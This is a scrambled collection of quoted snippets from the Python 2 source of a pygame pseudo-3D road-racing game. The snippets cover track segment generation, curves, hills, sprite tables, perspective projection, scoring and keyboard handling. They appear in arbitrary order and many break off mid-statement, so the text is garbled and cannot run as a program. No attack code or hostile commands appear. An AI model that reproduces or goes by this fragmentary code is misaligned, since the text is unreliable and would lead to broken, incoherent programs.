= (ys1 + ys3) / 2.0 x_dt =", "'>>> refresh' #''' if self.player_di == 3: # < self.player_x", "'self.position', self.position for i, seg in enumerate(self.segments): zw1 = seg['p1']['world']['z']", "font_size=32) self.lb1.rect.top = 200 self.lb1.rect.left = 100 self.disp_add(self.lb1) ''' def", "elif k == self.pglc.K_LEFT: return 3 else: return None def", "'score': -100,}, } class SptTmpx(sptdraw.SptDrawBase): def __init__(self, size, *args, **kwargs):", "= self.get_seg_base_i() print 'segbi', segbi # TODO: do at update", "= 116 pnts = [[x1, d-y1], [x2, d-y2], [x3, d-y3],", "rd_start_seg_init(self, n=3): seg_n = len(self.segments) if seg_n == 0: return", "= FP_COLORS['FINISH'] b_curve = self.player_seg.get('curve', 0.0) #b_percent = 0.5 b_percent", "3) class FPSptProgress(sptdraw.SptDrawBase): def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN): super(FPSptProgress, self).__init__(size)", "# <3> xx1 = rad1 * math.cos(engi * i) xx2", "#self.rd_seg_init_rand(10)#50#10#3#1 #segnrand = random.randint(3, 30) segnrand = random.randint(2, 6) #", "2 if trees.rect.left - trees.rect.width > 0: trees.rect.left -= trees.rect.width", "rd_seg_add(self, curve=0.0, yw=0.0): #print '+', curve, yw n = len(self.segments)", "100), c_prog=consts.GREEN) self.spd.rect.top = 70#340 self.spd.rect.left = 602 #self.spd.rotate(180) self.disp_add(self.spd)", "rd_seg_render__2_o(self): \"\"\"curve test 1\"\"\" #theta_i = math.pi /180.0 * 0.1", "cv_to_engl(self, curve, rad): a = float(curve) / rad #a *=", "-1]) enter = random.randint(10, 40) hold = random.randint(10, 40) leave", "return result def util_ease_in(self, a, b, percent): return a +", "while (result < 0): result += mx return result def", "-580 elif x_i == 4: sprt_at = 1100 elif x_i", "segs = self.segments[:-self.seg_draw_n] return segs # #### geometry #### #", "use the segment just under the car #sprts = self.player_seg['sprites']", "xcr4 = xcr4 - x_curve - dx_curve x_curve = x_curve", "score self.last_seg_i = 0 self.game_over = True self.game_score = 1.0", "cache self.rd_sprt_cache = [] # <1> #for i, seg in", "#y_sprt = (ys1 + ys3) / 2.0 x_dt = x_rnd", "2:v self.speed_dt_up = 1.0#2.0#3.0 self.speed_dt_dn = 2.0#4.0#6.0 self.speed_dt_na = 1.0#3.0", "= - (b_curve * b_percent) x_curve = 0 #print 'b_curve',", "40) if p < 0.3: curve = 0.0 yw =", "'y': 897, 'w': 298, 'h': 190 }, 'BILLBOARD07': { 'x':", "0.0 self.d = 200.0#100.0#10.0#30.0#1.0 self.w = self.size[0] self.h = self.size[1]", "'score': -5,}, 'pot2': 
{'imgs': ['img_sprts/i_pot2.png'], 'score': -1,}, 'shell': {'imgs': ['img_sprts/p_shell.png'],", "}, 'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM': 40, 'HIGH': 60", "self.tm_end - self.tm_start else: self.tm_start = 0.0 #self.tm_end = 0.0", "#return events r_events = [] for event in events: #print", "4: theta1 = theta_i * i theta2 = theta_i *", "class FPSptRoadB(sptdraw.SptDrawBase): def __init__(self, size, cfg, *args, **kwargs): super(FPSptRoadB, self).__init__(size)", "!= 1: self.player_go = 0 if 1 in e_keys_up: if", "i #xc2 = -self.road_w / 2 - self.player_x - curve_d", "print 'segbi', segbi self.player_seg = self.segments[segbi] b_curve = self.player_seg.get('curve', 0.0)", "theta2 = theta_i * (i + 1) dx1 = self.seg_len", "for test if i < 10: print '>>> ', i", "sky in self.bg_sky: #print sky sky.rect.left += int(self.sky_speed * p_dt)", "'x': 5, 'y': 897, 'w': 298, 'h': 190 }, 'BILLBOARD07':", "def add_road(self, enter, hold, leave, curve, yw=0.0): #print enter, hold,", "do at update #dpx1 = self.seg_len * math.tan(theta_i) #self.player_x -=", "'LENGTH': {'NONE': 0, 'SHORT': 25, 'MEDIUM': 50, 'LONG': 100 },", "'shell': {'imgs': ['img_sprts/p_shell.png'], 'score': -20,}, 'rockd': {'imgs': ['img_sprts/rock_d2.png'], 'score': -10,},", "}, 'PLAYER_UPHILL_RIGHT': { 'x': 1385, 'y': 1018, 'w': 80, 'h':", "'=' * 80 #print 'self.position', self.position for i, seg in", "== 0: return #self.segments[0]['color'] = FP_COLORS['START_Y'] #self.segments[2]['color'] = FP_COLORS['START_Y'] for", "'w': 1280, 'h': 480 }, } IMG_POS_SPRITES = { 'PALM_TREE':", "elif p < 0.7: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY'])", "/ 2 - self.player_x xc3 = self.road_w / 2 -", "* 2 sprt_at = 10000 if x_i == 0: sprt_at", "zw2 - self.camera_z - self.position # for curve xc1 =", "= 0.5#1.0#0.1# else: if cv_s: cv_l += curve else: cv_s", "-= hill.rect.width * 2 for trees in self.bg_trees: trees.rect.left +=", "300#200 #self.seg_draw_n = 200#150 self.seg_draw_n = 70#100#200#150 self.speed = 0.0", "'r') as fi: s = fi.read() segs = utils.json_loads(s) return", "'y': 1018, 'w': 80, 'h': 56 }, 'PLAYER_UPHILL_LEFT': { 'x':", "#''' ''' #x# if seg['index'] < segbi: zw1 = (i+1)*self.seg_len", "self.disp_add(self.rdpsd) self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16) self.scr.rect.top = 40#454 self.scr.rect.left", "yp1 = self.yc_to_yp(yc1, self.d, zc1) ys1 = self.yp_to_ys(yp1, self.h) ys2", "'h': 220 }, 'COLUMN': { 'x': 995, 'y': 5, 'w':", "40) hold = random.randint(10, 40) leave = random.randint(10, 40) curve", "* math.pi)/2) + 0.5) def util_curve_percent_remaining(self, n, total): return (n", "self.player_x - curve_d * i #xc3 = self.road_w / 2", "= info['name'] obj_k = str(seg['index']) + '_' + str(i) +", "def rd_seg_render(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i", "prog): y = self.size[1] * prog self.fill(self.c_bg) #self.pygm.draw.rect(self.surf, consts.GREEN, #", "is not None: try: segs = self.rd_seg_json_load(segs_file) self.segments = segs", "obj.scale(scale) except: #print 'scale <2>', scale pass x_i_saved = info.get('x_i')", "sprt = random.choice(FP_ROAD_SPRTS.keys()) s = { 'name': sprt, 'type': 1,", "= self.xp_to_xs(xpr1, self.w) xpr2 = self.xc_to_xp(xcr2, self.d, zc1) xsr2 =", "self.player_x -= 9 if self.player_x < -1000: self.player_di = 1", "cpnts, 3) class FPSptProgress(sptdraw.SptDrawBase): def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN): super(FPSptProgress,", 
"{'NONE': 0, 'SHORT': 25, 'MEDIUM': 50, 'LONG': 100 }, #", "elif x_i == 1: sprt_at = -40 elif x_i ==", "self.disp_add(self.fog) def get_seg_base_i(self, pos=None): if pos is None: pos =", "i #xc3 = self.road_w / 2 - self.player_x - curve_d", "# info['x_i'] = x_i # x_i_saved = x_i obj.rect.top =", "return pnts def draw_segs(self, segs, rad): pnts = self.get_segs_pnts(segs, rad)", "1, # image / animate / ... 'obj': None, #", "= (rad - xx2) - self.player_x xc3 = (rad -", "== 4: sprt_at = 1100 elif x_i == 5: sprt_at", "= 3 #print 'p_curve', p_curve p_dt = self.speed * p_curve", "= seg.get('sprites') if not sprts: return None for i, info", "car_w / 2): if (car_x - w_half) < sprt_at <", "0 self.rdmap.rect.left = 80 self.rdmap.rotate(90) self.disp_add(self.rdmap) self.rdpsd = pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN,", "# <2> si = (segbi + i) % seg_n #print", "= 10.0#50.0# x += rad_m * math.cos(tht) y += rad_m", "# #### geometry #### # def geo_prjc_scale(self, d, zc): if", "FPSptRoadMap(sptdraw.SptDrawBase): def __init__(self, size, segs, rad, *args, **kwargs): super(FPSptRoadMap, self).__init__(size)", "def get_seg_base_i(self, pos=None): if pos is None: pos = self.position", "a circle\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i =", "sprts = seg.get('sprites') if not sprts: return None for i,", "* self.centrifugal #print p_dt #self.player_x -= p_dt self.player_x += p_dt", "+ self.lane_w xcr1 = self.lane_w - self.player_x xcr2 = -self.lane_w", "not in ['obj']: spr_n[sk] = sv else: spr_n[sk] = None", "y1-d]] #pnts = [[x1, y1+a], [x2, y2+a], [x3, y3+a], [x4,", "- (self.position % self.seg_len) zc2 = zw2 - self.camera_z -", "yw1, yw2 xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1,", "'lane': '#CCCCCC'}, 'DARK': {'road': '#696969', 'grass': '#009A00', 'rumble': '#BBBBBB' },", "< sprt_x < (car_x + car_w / 2): if (car_x", "self.segments[si] #''' ''' # for test if i < 10:", "from starfish import consts from starfish import sptdraw from starfish", "*= 10.0 #print a s = 1.0 if a <", "hold, leave, 0.0, 0.0) def rd_seg_init_rand_curve(self, n=5): #print 'rd_seg_init_rand', n", "#self.track_len = (len(self.segments) - self.seg_draw_n) * self.seg_len def seg_lasy_y(self): seg_n", "y, scale): sprts = seg.get('sprites') if not sprts: return None", "self.bg_trees1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees1.rect.top = 0 self.bg_trees1.rect.left = 0", "return segs_c def rd_seg_json_save(self, f): sc = self.rd_seg_get_cleared(self.segments) s =", "{ 'SKY': '#72D7EE', 'TREE': '#005108', 'FOG': '#005108', 'LIGHT': {'road': '#6B6B6B',", "= -1.0 if a < -1.0: a = -1.0 elif", "- self.camera_z - self.position ''' # for curve xc1 =", "self.position zc2 = zw2 - self.camera_z - self.position curve_d =", "pnts] c = utils.clr_from_str(FP_COLOR_BLUE) #self.pygm.draw.polygon(self.surf, c, cpnts) self.pygm.draw.lines(self.surf, c, False,", "self.pglc.KEYDOWN: r_events.append(event) else: r_events.append(event) return r_events def refresh(self, fps_clock, *args,", "= self.xc_to_xp(xcr3, self.d, zc2) xsr3 = self.xp_to_xs(xpr3, self.w) xpr4 =", "self.rad = rad #self.fill(consts.WHITE) self.draw_segs(self.segs, self.rad) def xy_to_cntr(self, x, y):", "0: # self.score = 0 self.game_over = True self.game_score =", "= 2 ** 64 xp = xc else: xp =", "xs3, ys3, seg['color']['road']) def rd_seg_render__4_o(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0", "sc = self.rd_seg_get_cleared(self.segments) s = utils.json_dumps(sc) with open(f, 'w') as", "= 
self.tm_start else: self.tm_end = time.time() self.tm_last_once = self.tm_end -", "<= 1: return #if len(pnts) > 0: # pnts.append(pnts[0]) cpnts", "100) leave = random.randint(10, 100) self.add_road(enter, hold, leave, 0.0, 0.0)", "self.yp_to_ys(yp3, self.h) ys4 = ys3 ''' #if 1: #if i", "#print p_dt for sky in self.bg_sky: #print sky sky.rect.left +=", "out here self.rd_sprt_objs[obj_k] = obj # for reset to delete", "a segment seg_i = self.player_seg['index'] if seg_i > self.last_seg_i: self.last_seg_i", "= xc3 - x_curve - dx_curve xc4 = xc4 -", "FP_COLOR_WHITE}, 'FINISH': {'road': FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK}, 'START_Y': {'road':", "#a = 60 #pnts = [[x1, y1], [x2, y2], [x3,", "x_i_saved = info.get('x_i') #if not x_i_saved: # info['x_i'] = x_i", "995, 'y': 5, 'w': 200, 'h': 315 }, 'BILLBOARD01': {", "#zc2 = self.position - (zw2 - self.camera_z) xp1 = self.xc_to_xp(xc1,", "= self.yp_to_ys(yp3, self.h) ys4 = ys3 ''' #if 1: #if", "-230 #self.disp_add(self.bk) self.scn1 = FPSceneA() self.disp_add(self.scn1) road_file = kwargs.get('road_file') if", "/ zc) return yp def xp_to_xs(self, xp, w): #xs =", "2 for hill in self.bg_hills: hill.rect.left += int(self.hill_speed * p_dt)", "60#10#20 rad = self.road_w * 4#2 rad1 = rad +", "self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter), self.util_ease_out(start_y, end_y, float(n)/total)) for n in range(hold):", "rad1 = rad + self.road_w / 2 rad2 = rad", "in e_keys_dn: self.player_go = 2 if 1 in e_keys_dn: self.player_di", "self.bg_sky2.rect.left = self.bg_sky1.rect.width self.disp_add(self.bg_sky2) self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills1.rect.top =", "40)) #return o class FPSptRoadB(sptdraw.SptDrawBase): def __init__(self, size, cfg, *args,", "= len(self.segments) i = (i + seg_n) % seg_n return", "* p_curve * self.centrifugal #print p_dt #self.player_x -= p_dt self.player_x", "0.0 self.seg_len = 200.0#100.0#20.0#60.0#200.0# self.road_w = 2400#2000#600.0#200.0#1000.0#200# self.camera_h = 500.0#1000.0#", "__init__(self, img_file, pos, *args, **kwargs): super(FPSptSprts, self).__init__(img_file, pos) class FPSptFog(sptdraw.SptDrawBase):", "go out the road if self.player_x < -self.road_w / 2", "segs=None): if not segs: segs = self.segments segs_c = []", "* (n - i) ca = 200 / n *", "self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY']) else: enter = random.randint(10,", "the car self.player_di = 0 # 0:^ 1:> 2:v 3:<", "for segment draw #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 self.rd_seg_init(10) # for a3c train", "'COLUMN': { 'x': 995, 'y': 5, 'w': 200, 'h': 315", "+ 1)) xx4 = rad2 * math.cos(engi * (i +", "'rumble': '#555555', 'lane': '#CCCCCC'}, } FP_ROAD = { 'LENGTH': {'NONE':", "<1> #for i, seg in enumerate(self.segments): # <2> for i", "seg_i > self.last_seg_i: self.last_seg_i = seg_i else: return # NOTE:", "in seg['sprites']: spr_n = {} for sk, sv in spr.items():", "}, 'CAR01': { 'x': 1205, 'y': 1018, 'w': 80, 'h':", "xs4 += dx2 #+ dx1 #''' self.render_polygon(None, 0, ys1, self.w,", "1:^ 2:v self.speed_dt_up = 1.0#2.0#3.0 self.speed_dt_dn = 2.0#4.0#6.0 self.speed_dt_na =", "self.speed * p_curve * self.centrifugal #print p_dt #self.player_x -= p_dt", "def draw_on(self, *args, **kwargs): #self.fill(self.c) d = 2 n =", "#self.rd_seg_init(100)#20#500#2#10#4#1#100#200 #self.rd_seg_init(random.randint(30, 100)) 
self.rd_seg_init(random.randint(1, 10)) # for a3c train self.rd_seg_init_rand_curve()", "yw1 = seg['p1']['world'].get('y', 0.0) yw2 = seg['p2']['world'].get('y', 0.0) yc1 =", "#print si seg = self.segments[si] #x#zw1 = (i+1)*self.seg_len #zw2 =", "/ total def add_road(self, enter, hold, leave, curve, yw=0.0): #print", "utils.clr_from_str(color) try: self.pygm.draw.polygon(self.surf, c, pnts) except Exception as e: #print", "= float('inf') #yp = 2 ** 64 yp = yc", "if i < 10: print xs1, ys1, xs2, ys2 print", "if curve == 0.0: rad_m = 1.0#0.1# else: a =", "self.score += scr def check_tm(self): if self.position > self.seg_len *", "+ self.lane_w xcl3 = xc3 - self.lane_w xcl4 = xc4", "p[1]) for p in pnts] c = utils.clr_from_str(FP_COLOR_BLUE) #self.pygm.draw.polygon(self.surf, c,", "self.lane_w xcl4 = xc4 + self.lane_w xcr1 = self.lane_w -", "r_events.append(event) self.e_keys_up = e_keys_up self.e_keys_dn = e_keys_dn return r_events def", "/ ', seg_n self.player_seg = self.segments[segbi] self.base_seg = self.segments[(segbi +", "rl * random.random() * 8.0 yw = 0.0 self.add_road(enter, hold,", "segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file) self.rdmap_reset() def road_segs_to_file(self,", "[x3, y3], [x4, y4], [x1, y1]] #pnts = [[x1, y1-d],", "zw1 - self.camera_z - (self.position % self.seg_len) zc2 = zw2", "self.add_fog() def prms_reset(self, keep_segs=False): self.e_keys_up = [] self.e_keys_dn = []", "80, 'h': 45 }, 'PLAYER_LEFT': { 'x': 995, 'y': 480,", "num, 0, -height) self.add_road(num, num, num, 0, height) self.add_road(num, num,", "NOTE: objs will be deleted at rd_sprts_del_all_objs() ##del self.rd_sprt_objs[obj_k] img", "event in events: #print event if event.type == self.pglc.KEYUP: di", "self.pygm.draw.circle(self.surf, consts.WHITE, (self.size[0] / 2, self.size[1] / 2), self.size[0] /", "si seg = self.segments[si] #''' ''' # for test if", "<:::>', 640, 480, road_file='sr_road.txt') sf.mainloop() if __name__ == '__main__': main()", "starfish import sptdraw from starfish import utils IMG_POS_BACKGROUND = {", "'grass': FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK}, 'START_Y': {'road': FP_COLOR_YELLOW, 'grass': '#10AA10', 'rumble':", "here we should use the segment just under the car", "+ sky.rect.width < 0: sky.rect.left += sky.rect.width * 2 if", "/ 2 - self.player_x # <3> #engi = math.pi /", "pygm from starfish import consts from starfish import sptdraw from", "kwargs.get('car') self.bg_sky = kwargs.get('bg_sky') self.bg_hills = kwargs.get('bg_hills') self.bg_trees = kwargs.get('bg_trees')", "0.0: self.speed = 0.0 elif self.speed > self.speed_max: self.speed =", "#+ dx1 xs4 += dx2 #+ dx1 ''' self.render_polygon(None, 0,", "p_dt) # always move the cloud #sky.rect.left -= self.sky_speed if", "FP_ROAD['LENGTH']['MEDIUM'], 0.0) def add_low_rolling_hills(self, num, height): num = num or", "ys4, seg['color']['rumble']) xpr1 = self.xc_to_xp(xcr1, self.d, zc1) xsr1 = self.xp_to_xs(xpr1,", "keep_segs: self.segments = [] self.rd_sprt_objs = {} self.rd_sprt_cache = []", "== 0: sprt_at = 40 elif x_i == 1: sprt_at", "2 ** 64 yp = yc else: yp = yc", "'name': sprt, 'type': 1, # image / animate / ...", "x1, y1, x2, y2, x3, y3, x4, y4, color): #d", "/ 2 - self.player_x - curve_d * i # <3>", "ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3 ''' #if 1:", "ys3, seg['color']['road']) def rd_seg_render__4_o(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0 *", "= 0.0 else: rad_m = 0.5#1.0#0.1# else: if cv_s: cv_l", "995, 'y': 330, 'w': 195, 'h': 
140 }, 'SEMI': {", "p_curve p_dt = self.speed * p_curve * self.centrifugal #p_dt =", "first sprite ! sprt = sprts[0] x_i = sprt.get('x_i') if", "= seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1 = zw1 - self.camera_z", "[] for seg in segs: if not seg['sprites']: segs_c.append(seg) else:", "def cv_to_engl(self, curve, rad): a = float(curve) / rad #a", "200.0#100.0#10.0#30.0#1.0 self.w = self.size[0] self.h = self.size[1] if not keep_segs:", "s = -1.0 if a < -1.0: a = -1.0", "= self.bg_sky1.rect.width self.disp_add(self.bg_sky2) self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills1.rect.top = 0", "http://pixel.garoux.net/screen/game_list Usage: * UP/DOWN/LEFT/RIGHT * SPACE : hide/show road map", "+ 20 else: pass p_curve = self.player_seg.get('curve', 0.0) #print 'p_curve',", "events, *args, **kwargs): return events def refresh(self, fps_clock, *args, **kwargs):", "10 if self.speed < 0.0: self.speed = 0.0 elif self.speed", "self.player_x xc3 = (rad - xx3) - self.player_x xc4 =", "/ 60#10#20 rad = self.road_w * 4#2 rad1 = rad", "self.add_road(enter, hold, leave, 0.0, 0.0) def rd_seg_init_rand_curve(self, n=5): #print 'rd_seg_init_rand',", "1000: self.player_di = 3 #''' #''' self.position += 10.0#5.0#1.0 self.position", "segments 'CURVE': {'NONE': 0, 'EASY': 2, 'MEDIUM': 4, 'HARD': 6", "curve, yw n = len(self.segments) #print n if n %", "4.0) #self.rd_seg_init_rand(10)#50#10#3#1 #segnrand = random.randint(3, 30) segnrand = random.randint(2, 6)", "IMG_POS_SPRITES['PLAYER_STRAIGHT']) #print self.road.cameraDepth/self.road.playerZ #self.car.scale(self.road.cameraDepth/self.road.playerZ) self.car.scale(2) self.car.rect.top = 400 self.car.rect.left =", "dx1 = self.seg_len * math.tan(theta1) dx2 = self.seg_len * math.tan(theta2)", "ys2 = ys1 yp3 = self.yc_to_yp(yc, self.d, zc2) ys3 =", "self.e_keys_dn = [] self.camera_x = 0.0 self.camera_y = 0.0 self.camera_z", "elif self.player_di == 3: #self.player_x -= self.player_x_dt self.player_x -= self.speed", "/ 2, self.size[1] / 2), self.size[0] / 2, 0) class", "if 0 in e_keys_dn: self.player_go = 1 elif 2 in", "ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render__2_o(self): \"\"\"curve test 1\"\"\" #theta_i", "hills yw1 = seg['p1']['world'].get('y', 0.0) yw2 = seg['p2']['world'].get('y', 0.0) yc1", "'#555555', 'lane': '#CCCCCC'}, } FP_ROAD = { 'LENGTH': {'NONE': 0,", "self.road_segs_to_file() else: r_events.append(event) elif event.type == self.pglc.KEYDOWN: r_events.append(event) else: r_events.append(event)", "segs = self.rd_seg_json_load(segs_file) self.segments = segs self.track_len = len(self.segments) *", "}, 'BILLBOARD05': { 'x': 5, 'y': 897, 'w': 298, 'h':", "#sky.rect.left -= self.sky_speed if sky.rect.left + sky.rect.width < 0: sky.rect.left", "100)) self.rd_seg_init(random.randint(1, 10)) # for a3c train self.rd_seg_init_rand_curve() #self.add_curves() #self.add_low_rolling_hills(20,", "80 self.rdmap.rotate(90) self.disp_add(self.rdmap) self.rdpsd = pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN, font_size=12) self.rdpsd.rect.top =", "2: if i < self.seg_draw_n / 4: theta1 = theta_i", "> self.last_seg_i: self.last_seg_i = seg_i else: return # NOTE: here", "-self.lane_w - self.player_x yc = self.camera_h #print '=' * 80", "hill.rect.left += int(self.hill_speed * p_dt) if hill.rect.left + hill.rect.width <", "kwargs.get('road_file') if road_file: self.scn1.straight.road_reset_from_file(segs_file=road_file) def main(): #sf = GMFlatpath('flatpath <:::>',", "the car #sprts = 
self.player_seg['sprites'] sprts = self.base_seg['sprites'] if not", "self.speed = 0.0 self.position = 0.0 self.player_x = 0.0#100.0#1000.0# self.centrifugal", "1]['p2']['world'].get('y', 0.0) def rd_seg_init_rand(self, n=50): #print 'rd_seg_init_rand', n for i", "seg['color']['rumble']) xpr1 = self.xc_to_xp(xcr1, self.d, zc1) xsr1 = self.xp_to_xs(xpr1, self.w)", "__init__(self, size, segs, rad, *args, **kwargs): super(FPSptRoadMap, self).__init__(size) self.segs =", "= self.xc_to_xp(xcr4, self.d, zc2) xsr4 = self.xp_to_xs(xpr4, self.w) self.render_polygon(None, xsr1,", "/ 2.0 / 60#10#20 rad = self.road_w * 4#2 rad1", "self.bk.rect.left = -230 #self.disp_add(self.bk) self.scn1 = FPSceneA() self.disp_add(self.scn1) road_file =", "{'road': FP_COLOR_YELLOW, 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'}, } FP_ROAD", "hill.rect.left -= hill.rect.width * 2 for trees in self.bg_trees: trees.rect.left", "1: self.player_go = 0 if 1 in e_keys_up: if self.player_di", "'p_curve', p_curve p_dt = self.speed * p_curve * self.centrifugal #p_dt", "self.road_w / 2 - self.player_x - curve_d * i #xc4", "self.speed <= 0.0: return p_curve = self.player_seg.get('curve', 0.0) #p_curve =", "xpr4 = self.xc_to_xp(xcr4, self.d, zc2) xsr4 = self.xp_to_xs(xpr4, self.w) self.render_polygon(None,", "= self.segments[segbi] self.base_seg = self.segments[(segbi + 2) % seg_n] #", "['img_sprts/clown1.png'], 'score': -100,}, } class SptTmpx(sptdraw.SptDrawBase): def __init__(self, size, *args,", "self.rdpsd.rect.left = 312 self.disp_add(self.rdpsd) self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16) self.scr.rect.top", "# make sure we check score once for a segment", "xs def yp_to_ys(self, yp, h): #ys = h / 2.0", "0 self.game_over = True self.game_score = 1.0 if self.player_di ==", "class FPSptProgress(sptdraw.SptDrawBase): def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN): super(FPSptProgress, self).__init__(size) self.c_bg", "whole=False): if whole: segs = self.segments else: segs = self.segments[:-self.seg_draw_n]", "{ 'x': 1205, 'y': 760, 'w': 168, 'h': 248 },", "avoid: pygame.error: Width or height is too large if scale", "= 0.0 rad_m = 4.0#2.0#1.0# cv_s = 0 cv_l =", "#print p rl = random.choice([1, -1]) enter = random.randint(10, 40)", "def get_segs_pnts(self, segs, rad): pnts = [] x, y =", "self.w, ys2, self.w, ys4, 0, ys3, seg['color']['grass']) # road self.render_polygon(None,", "obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0]) info['obj'] = obj self.disp_add(obj) ''' # <2>", "def key_to_di(self, k): if k == self.pglc.K_UP: return 0 elif", "xs3 += dx2 #+ dx1 xs4 += dx2 #+ dx1", "... 'obj': None, # need to create at render ##'x_i':", "= {'road': FP_COLOR_WHITE} else: c = FP_COLORS['DARK'] #c = {'road':", "the first sprite ! 
sprt = sprts[0] x_i = sprt.get('x_i')", "elif x_i == 3: sprt_at = -580 elif x_i ==", "for curve xc1 = xc1 - x_curve xc2 = xc2", "< 0: trees.rect.left += trees.rect.width * 2 if trees.rect.left -", "+ 20 elif self.player_di == 3: #self.player_x -= self.player_x_dt self.player_x", "zw2 - self.camera_z - (self.position % self.seg_len) ''' #x# zw1", "{ 'index': n, 'p1': {'world': {'z': (n + 1) *", "# for a3c train self.rd_start_seg_init() self.rd_sprts_init_rand() def draw_on(self, *args, **kwargs):", "hold, leave, curve, yw) def rd_start_seg_init(self, n=3): seg_n = len(self.segments)", "**kwargs): super(FPSptBg, self).__init__(img_file, pos) class FPSptSprts(pygm.SptImgOne): def __init__(self, img_file, pos,", "''' zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1 = zw1", "/ 2 + x, self.size[1] / 2 - y] def", "'h': 155 }, 'CACTUS': { 'x': 929, 'y': 897, 'w':", "!= 1: self.player_di = 0 def update_world(self): if self.player_go ==", "[0, i * d, self.size[0], d] #ca = 255 /", "+ i) % seg_n #print si seg = self.segments[si] #x#zw1", "if 0 in e_keys_up: if self.player_go != 2: self.player_go =", "2 - self.player_x #xcl1 = xc1 - self.lane_w #xcl2 =", "leave, curve, yw=0.0): #print enter, hold, leave, curve, yw start_y", "**kwargs): self.fill(consts.GREEN) self.pygm.draw.circle(self.surf, consts.WHITE, (self.size[0] / 2, self.size[1] / 2),", "self.position # <2> seg_n = len(self.segments) segbi = self.get_seg_base_i() print", "'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score': -50,}, #'ashra_defeat': {'imgs': ['img_sprts/ashra_defeat1.png'], 'score': -100,},", "/ 2 - self.player_x - curve_d * i #xc4 =", "* RETURN : go to a new road TODO: *", "0: sky.rect.left -= sky.rect.width * 2 for hill in self.bg_hills:", "events if not self.flag_check_event: return events else: return self.check_key(events) def", "else: enter = random.randint(10, 100) hold = random.randint(10, 100) leave", "-height) self.add_road(num, num, num, 0, height) self.add_road(num, num, num, 0,", "self.h) ys2 = ys1 yp3 = self.yc_to_yp(yc, self.d, zc2) ys3", "2 - self.player_x - curve_d * i #xc3 = self.road_w", "i * d, self.size[0], d] #ca = 255 / n", "'y': 490, 'w': 122, 'h': 144 }, 'TRUCK': { 'x':", "/ n * (n - i) self.c[3] = ca self.pygm.draw.rect(self.surf,", "self.camera_h self.xw = 0.0 self.yw = 0.0 self.zw = 0.0", "y4], [x1, y1]] #pnts = [[x1, y1-d], [x2, y2-d], [x3,", "'w': 80, 'h': 59 }, 'CAR04': { 'x': 1383, 'y':", "-= sky.rect.width * 2 if self.speed <= 0.0: return p_curve", "'y': 531, 'w': 80, 'h': 41 } } FP_COLOR_WHITE =", "# <2> for i in range(self.seg_draw_n): #''' # <2> si", "check if this seg is looped seg_scale = self.geo_prjc_scale(self.d, zc1)", "math.tan(theta_i) #self.player_x -= dpx1 # <1> #for i, seg in", "(n - i) self.c[3] = ca self.pygm.draw.rect(self.surf, self.c, rct) class", "self.pglc.K_v or k == self.pglc.K_n: return 2 elif k ==", "x_sprt = (xsr1 + xsl1) / 2.0 #x_sprt = random.choice(x_pos)", "render_polygon(self, ctx, x1, y1, x2, y2, x3, y3, x4, y4,", "self.pglc.K_RIGHT: return 1 elif k == self.pglc.K_DOWN: return 2 elif", "ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3 ''' # for", "1: #self.player_x += self.player_x_dt self.player_x += self.speed / 5 +", "p_dt self.player_x += p_dt def check_if_car_out_road(self): # decrease score when", "else: curve = rl * random.random() * 6.0 yw =", "IMG_POS_BACKGROUND['HILLS']) self.bg_hills1.rect.top = 0 self.bg_hills1.rect.left = 0 self.disp_add(self.bg_hills1) self.bg_hills2 =", "k == self.pglc.K_SLASH: self.road_segs_to_file() else: 
